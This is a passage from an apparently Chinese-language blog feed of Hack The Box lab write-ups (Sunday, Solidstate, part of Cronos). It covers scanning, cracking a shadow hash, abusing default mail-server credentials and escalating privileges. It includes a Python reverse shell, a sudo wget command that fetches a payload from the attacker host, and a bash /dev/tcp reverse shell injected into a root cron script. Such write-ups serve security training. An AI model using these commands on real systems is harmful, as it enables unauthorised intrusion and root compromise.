/post/hackbox/sunday/image/image_p1baulwPVk_huee92e5212d8ff67c3dbf3462a5370c91_49130_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_p1baulwPVk_huee92e5212d8ff67c3dbf3462a5370c91_49130_bcc9dc42a8ff16b48fbd840cfe0ef580.webp"
width="731"
height="150"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;p>&lt;code>/root/troll&lt;/code> 这个脚本写死了&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_2X908TVN4G_hua685a4d0b7f63c85e83adf789c077c23_61841_b46438a7e549e3c2033c549098cf9d32.webp 400w,
/post/hackbox/sunday/image/image_2X908TVN4G_hua685a4d0b7f63c85e83adf789c077c23_61841_94a43f62b17e51ed0da77cf450028fb0.webp 760w,
/post/hackbox/sunday/image/image_2X908TVN4G_hua685a4d0b7f63c85e83adf789c077c23_61841_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_2X908TVN4G_hua685a4d0b7f63c85e83adf789c077c23_61841_b46438a7e549e3c2033c549098cf9d32.webp"
width="556"
height="258"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现备份文件 &lt;code>/backup/shadow.backup&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_eLEVrC9X6s_hub73bfe3430f3485067ad0c9508091b31_139663_a2325becfad1931914affff5d6733d1f.webp 400w,
/post/hackbox/sunday/image/image_eLEVrC9X6s_hub73bfe3430f3485067ad0c9508091b31_139663_c6773f3b25838d0da25c920cd3852757.webp 760w,
/post/hackbox/sunday/image/image_eLEVrC9X6s_hub73bfe3430f3485067ad0c9508091b31_139663_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_eLEVrC9X6s_hub73bfe3430f3485067ad0c9508091b31_139663_a2325becfad1931914affff5d6733d1f.webp"
width="971"
height="433"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>使用john破解sammy密码，保存到文件&lt;code>sammy.txt&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$5$Ebkn8jlK$i6SSPa0&lt;/span>.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">john --wordlist&lt;span class="o">=&lt;/span>/usr/share/wordlists/rockyou.txt sammy.txt
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>得到&lt;code>sammy&lt;/code>密码&lt;code>cooldude!&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_nn7vTO6CQA_hud4c545dc27aa21b10c9c59bafc9a59ed_190611_c324caacdae521696d06500be043c1bb.webp 400w,
/post/hackbox/sunday/image/image_nn7vTO6CQA_hud4c545dc27aa21b10c9c59bafc9a59ed_190611_7997bb9d12ec3ab3017a99f37c12c681.webp 760w,
/post/hackbox/sunday/image/image_nn7vTO6CQA_hud4c545dc27aa21b10c9c59bafc9a59ed_190611_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_nn7vTO6CQA_hud4c545dc27aa21b10c9c59bafc9a59ed_190611_c324caacdae521696d06500be043c1bb.webp"
width="1147"
height="457"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>执行&lt;code>sudo -l&lt;/code> 发现&lt;code>sunny&lt;/code>免密执行&lt;code>/root/troll&lt;/code>，&lt;code>sammy&lt;/code>免密执行&lt;code>root&lt;/code>权限的&lt;code>/usr/bin/wget&lt;/code>，&lt;/p>
&lt;p>通过&lt;code>wget&lt;/code>覆盖&lt;code>/root/troll&lt;/code> 即可获得root shell&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_caSqAyQNso_hu6c73983df02b1bfdbb790db08d9ebbf3_84315_6a6aad86fcbb92a62abb20f97652760c.webp 400w,
/post/hackbox/sunday/image/image_caSqAyQNso_hu6c73983df02b1bfdbb790db08d9ebbf3_84315_8a79e1f3bdcd4285c7baab0ddc76c998.webp 760w,
/post/hackbox/sunday/image/image_caSqAyQNso_hu6c73983df02b1bfdbb790db08d9ebbf3_84315_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_caSqAyQNso_hu6c73983df02b1bfdbb790db08d9ebbf3_84315_6a6aad86fcbb92a62abb20f97652760c.webp"
width="604"
height="449"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="ch">#!/usr/bin/python&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">socket&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">subprocess&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">import&lt;/span> &lt;span class="nn">os&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">s&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">socket&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">socket&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">socket&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">AF_INET&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="n">socket&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">SOCK_STREAM&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">s&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">connect&lt;/span>&lt;span class="p">((&lt;/span>&lt;span class="s2">&amp;#34;10.10.14.2&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">2333&lt;/span>&lt;span class="p">))&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">dup2&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">fileno&lt;/span>&lt;span class="p">(),&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">dup2&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">fileno&lt;/span>&lt;span class="p">(),&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">os&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">dup2&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">s&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">fileno&lt;/span>&lt;span class="p">(),&lt;/span>&lt;span class="mi">2&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="n">subprocess&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">call&lt;/span>&lt;span class="p">([&lt;/span>&lt;span class="s2">&amp;#34;/bin/sh&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;-i&amp;#34;&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>sammy&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo wget -O /root/troll http://10.10.14.2/shell.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_fIO80XMK8y_huc440881341c8140b8321d5a7911b4f6b_92945_9f23aacdea329771bc14080f9ae3f2aa.webp 400w,
/post/hackbox/sunday/image/image_fIO80XMK8y_huc440881341c8140b8321d5a7911b4f6b_92945_a1cbeedfb2f628b9547f02ef76afa799.webp 760w,
/post/hackbox/sunday/image/image_fIO80XMK8y_huc440881341c8140b8321d5a7911b4f6b_92945_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_fIO80XMK8y_huc440881341c8140b8321d5a7911b4f6b_92945_9f23aacdea329771bc14080f9ae3f2aa.webp"
width="1087"
height="254"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>sunny&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#这里要执行快一点，有定时任务会快速覆盖这个文件&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">sudo /root/troll
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>获得shell&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/sunday/image/image_Qm8oo7uMCa_hubb520c38251d888ad0e1bde337ec25e7_97424_6c2db1e7dc11a6a0be87600709aa8629.webp 400w,
/post/hackbox/sunday/image/image_Qm8oo7uMCa_hubb520c38251d888ad0e1bde337ec25e7_97424_1f2c7acf245a9df825352aa96e22d2f8.webp 760w,
/post/hackbox/sunday/image/image_Qm8oo7uMCa_hubb520c38251d888ad0e1bde337ec25e7_97424_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/sunday/image/image_Qm8oo7uMCa_hubb520c38251d888ad0e1bde337ec25e7_97424_6c2db1e7dc11a6a0be87600709aa8629.webp"
width="876"
height="361"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Solidstate</title><link>https://docs.kaiasec.tk/post/hackbox/solidstate/</link><pubDate>Thu, 02 Jun 2022 17:54:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/solidstate/</guid><description>&lt;h1 id="solidstate">Solidstate&lt;/h1>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.51
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_NkhXmjgTIB_hu0904316df650352e0a8983c015b66c87_177503_41194c8e6f74e212abb701c6461d7c61.webp 400w,
/post/hackbox/solidstate/image/image_NkhXmjgTIB_hu0904316df650352e0a8983c015b66c87_177503_1e48c3f54ab44dd190ef0606712459e8.webp 760w,
/post/hackbox/solidstate/image/image_NkhXmjgTIB_hu0904316df650352e0a8983c015b66c87_177503_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_NkhXmjgTIB_hu0904316df650352e0a8983c015b66c87_177503_41194c8e6f74e212abb701c6461d7c61.webp"
width="900"
height="371"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>80端口，扫了目录没有什么发现，根据端口开放情况，可能是针对邮件服务器的渗透&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_sI_RlGs2RG_hu3211dca0aab57dff653987dee22e3487_672876_88df76d0aecab239cd5e1ef81fb995a4.webp 400w,
/post/hackbox/solidstate/image/image_sI_RlGs2RG_hu3211dca0aab57dff653987dee22e3487_672876_143e18ca94b38f128d5ed84877998c08.webp 760w,
/post/hackbox/solidstate/image/image_sI_RlGs2RG_hu3211dca0aab57dff653987dee22e3487_672876_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_sI_RlGs2RG_hu3211dca0aab57dff653987dee22e3487_672876_88df76d0aecab239cd5e1ef81fb995a4.webp"
width="1166"
height="572"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>4555&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">JAMES Remote Administration Tool 2.3.2
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_T3u599kmYI_hu95d2d95ea3781e6fa0bccc4ca17931a8_96168_0acb7ef7cef14ca9ff72f84707ca9a2e.webp 400w,
/post/hackbox/solidstate/image/image_T3u599kmYI_hu95d2d95ea3781e6fa0bccc4ca17931a8_96168_6d5fe6db8aa0e000a2fe69d232c9cb87.webp 760w,
/post/hackbox/solidstate/image/image_T3u599kmYI_hu95d2d95ea3781e6fa0bccc4ca17931a8_96168_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_T3u599kmYI_hu95d2d95ea3781e6fa0bccc4ca17931a8_96168_0acb7ef7cef14ca9ff72f84707ca9a2e.webp"
width="655"
height="265"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>james默认口令&lt;code>root/root&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_O8k2rwV9Vv_hu8bcfaf84b9440d0569a0723d46029776_41316_9f10d30ebbebc0ee37866ab65ef8f1c6.webp 400w,
/post/hackbox/solidstate/image/image_O8k2rwV9Vv_hu8bcfaf84b9440d0569a0723d46029776_41316_c958cb8b51f29faa1e2c92e0ce6a1490.webp 760w,
/post/hackbox/solidstate/image/image_O8k2rwV9Vv_hu8bcfaf84b9440d0569a0723d46029776_41316_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_O8k2rwV9Vv_hu8bcfaf84b9440d0569a0723d46029776_41316_9f10d30ebbebc0ee37866ab65ef8f1c6.webp"
width="525"
height="250"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>修改邮件用户密码&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#查询用户列表&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">listusers
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#修改用户密码&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">setpassowrd &amp;lt;user&amp;gt; &amp;lt;password&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_2GevEVNS73_hu2a456aff9e58d4f5f0ddf534661d9955_114221_5d419a63480f6aafb54b411118a4f2fb.webp 400w,
/post/hackbox/solidstate/image/image_2GevEVNS73_hu2a456aff9e58d4f5f0ddf534661d9955_114221_0805d4c663e309cefe93f6daba677a34.webp 760w,
/post/hackbox/solidstate/image/image_2GevEVNS73_hu2a456aff9e58d4f5f0ddf534661d9955_114221_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_2GevEVNS73_hu2a456aff9e58d4f5f0ddf534661d9955_114221_5d419a63480f6aafb54b411118a4f2fb.webp"
width="627"
height="422"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>登录&lt;code> mindy&lt;/code> &lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">telnet 10.10.10.51 &lt;span class="m">110&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">USER mindy
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PASS &lt;span class="m">123456&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#查看第二封邮件&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">retr &lt;span class="m">2&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>第二封邮件发现了管理员&lt;code>mailadmin&lt;/code>发的ssh账号密码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image__80RrT5Ed3_huee84fc109ffce52908fe320e1662cdba_217958_fd25ec1ce4154d026ad8897ab844cbac.webp 400w,
/post/hackbox/solidstate/image/image__80RrT5Ed3_huee84fc109ffce52908fe320e1662cdba_217958_31adadd37561d00c70b75e7bb7c522e8.webp 760w,
/post/hackbox/solidstate/image/image__80RrT5Ed3_huee84fc109ffce52908fe320e1662cdba_217958_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image__80RrT5Ed3_huee84fc109ffce52908fe320e1662cdba_217958_fd25ec1ce4154d026ad8897ab844cbac.webp"
width="927"
height="553"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">username: mindy
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">pass: P@55W0rd1!2@
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录ssh&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_9G0HwKNXdp_hu4b3e8c1343232ac120dd146d4275814f_185055_5cf90c2ae30fdcfcd66da7c07dc0e88d.webp 400w,
/post/hackbox/solidstate/image/image_9G0HwKNXdp_hu4b3e8c1343232ac120dd146d4275814f_185055_e6044db5a94636b7fd0a67782b7abf15.webp 760w,
/post/hackbox/solidstate/image/image_9G0HwKNXdp_hu4b3e8c1343232ac120dd146d4275814f_185055_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_9G0HwKNXdp_hu4b3e8c1343232ac120dd146d4275814f_185055_5cf90c2ae30fdcfcd66da7c07dc0e88d.webp"
width="930"
height="429"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>提权&lt;/p>
&lt;p>&lt;code>mindy&lt;/code>的shell是&lt;code>rbash&lt;/code>，很多命令无法执行，将rbash提升到bash，重新登录&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">ssh mindy@10.10.10.51 -t bash
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_26oN4kKv-t_hu5925586b3e1d1616cb06c84296d42935_92488_114b8a1abf818b021ee59eebb9f890c9.webp 400w,
/post/hackbox/solidstate/image/image_26oN4kKv-t_hu5925586b3e1d1616cb06c84296d42935_92488_a785f71d0defc7eb3237a507286dd6b1.webp 760w,
/post/hackbox/solidstate/image/image_26oN4kKv-t_hu5925586b3e1d1616cb06c84296d42935_92488_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_26oN4kKv-t_hu5925586b3e1d1616cb06c84296d42935_92488_114b8a1abf818b021ee59eebb9f890c9.webp"
width="759"
height="216"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>下载&lt;code>pspy32&lt;/code>到靶机执行&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_Y9su6v2Vef_hua7a1fe3da3c4e09c42832f02f8529516_43559_a3f8865540f52577c6078f49189097ef.webp 400w,
/post/hackbox/solidstate/image/image_Y9su6v2Vef_hua7a1fe3da3c4e09c42832f02f8529516_43559_49a3324edc81aa7a472bc8fe53afe9f6.webp 760w,
/post/hackbox/solidstate/image/image_Y9su6v2Vef_hua7a1fe3da3c4e09c42832f02f8529516_43559_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_Y9su6v2Vef_hua7a1fe3da3c4e09c42832f02f8529516_43559_a3f8865540f52577c6078f49189097ef.webp"
width="798"
height="116"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>监控发现每3分钟 &lt;code>root&lt;/code>执行一次&lt;code>python /opt/tmp.py&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_B1tCCx-09V_hu9ab9020c571ba0217c09ab249da67ad4_65004_d6ef77540b8967d2284a17b3583233fb.webp 400w,
/post/hackbox/solidstate/image/image_B1tCCx-09V_hu9ab9020c571ba0217c09ab249da67ad4_65004_00781d2244641411126ea911068a15aa.webp 760w,
/post/hackbox/solidstate/image/image_B1tCCx-09V_hu9ab9020c571ba0217c09ab249da67ad4_65004_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_B1tCCx-09V_hu9ab9020c571ba0217c09ab249da67ad4_65004_d6ef77540b8967d2284a17b3583233fb.webp"
width="1004"
height="141"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>直接修改&lt;code>tmp.py&lt;/code> 内容为反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;os.system(&amp;#39;bash -c &amp;#34;&lt;/span>bash -i &amp;gt;&lt;span class="p">&amp;amp;&lt;/span> /dev/tcp/10.10.14.8/2333 0&amp;gt;&lt;span class="p">&amp;amp;&lt;/span>1&lt;span class="s2">&amp;#34;&amp;#39;)&amp;#34;&lt;/span>&amp;gt;&amp;gt;/opt/tmp.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/solidstate/image/image_MDrpmWme1X_huf70a9dfe37f8a290321ab86ba130d4dd_97142_ecdeaaaf87bbe9f1a8012dbc2cfbdb9e.webp 400w,
/post/hackbox/solidstate/image/image_MDrpmWme1X_huf70a9dfe37f8a290321ab86ba130d4dd_97142_87a7243155d277b10bf89496dea8653e.webp 760w,
/post/hackbox/solidstate/image/image_MDrpmWme1X_huf70a9dfe37f8a290321ab86ba130d4dd_97142_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/solidstate/image/image_MDrpmWme1X_huf70a9dfe37f8a290321ab86ba130d4dd_97142_ecdeaaaf87bbe9f1a8012dbc2cfbdb9e.webp"
width="955"
height="287"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Cronos</title><link>https://docs.kaiasec.tk/post/hackbox/cronos/</link><pubDate>Fri, 20 May 2022 17:31:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/cronos/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.13
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_6ZLrT3hBaR_huad3da1e7b4c43b318eb30d90764e2a3b_77177_3b84ef79ef8a4de0d7f02763be162071.webp 400w,
/post/hackbox/cronos/image/image_6ZLrT3hBaR_huad3da1e7b4c43b318eb30d90764e2a3b_77177_c9be94591778bc06b4079084d0f1a2b4.webp 760w,
/post/hackbox/cronos/image/image_6ZLrT3hBaR_huad3da1e7b4c43b318eb30d90764e2a3b_77177_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_6ZLrT3hBaR_huad3da1e7b4c43b318eb30d90764e2a3b_77177_3b84ef79ef8a4de0d7f02763be162071.webp"
width="768"
height="239"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问80，扫了下目录什么也没有。&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image__zp7qiDmEj_huded3babc861f02318ef0cd886a3c1f61_185798_f1ff14fbc16dd4d0709ffd51333aaa4a.webp 400w,
/post/hackbox/cronos/image/image__zp7qiDmEj_huded3babc861f02318ef0cd886a3c1f61_185798_e9b73ce121e22c93b4485a826e2cce53.webp 760w,
/post/hackbox/cronos/image/image__zp7qiDmEj_huded3babc861f02318ef0cd886a3c1f61_185798_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image__zp7qiDmEj_huded3babc861f02318ef0cd886a3c1f61_185798_f1ff14fbc16dd4d0709ffd51333aaa4a.webp"
width="1169"
height="709"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>53端口，尝试解析靶机的域名&lt;/p>
&lt;p>使用nslookup指定靶机为DNS服务器，然后解析靶机的域名&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">nslookup
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&amp;gt; server 10.10.10.13
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Default server: 10.10.10.13
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Address: 10.10.10.13#53
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&amp;gt; 10.10.10.13
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">13.10.10.10.in-addr.arpa &lt;span class="nv">name&lt;/span> &lt;span class="o">=&lt;/span> ns1.cronos.htb.
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&amp;gt;
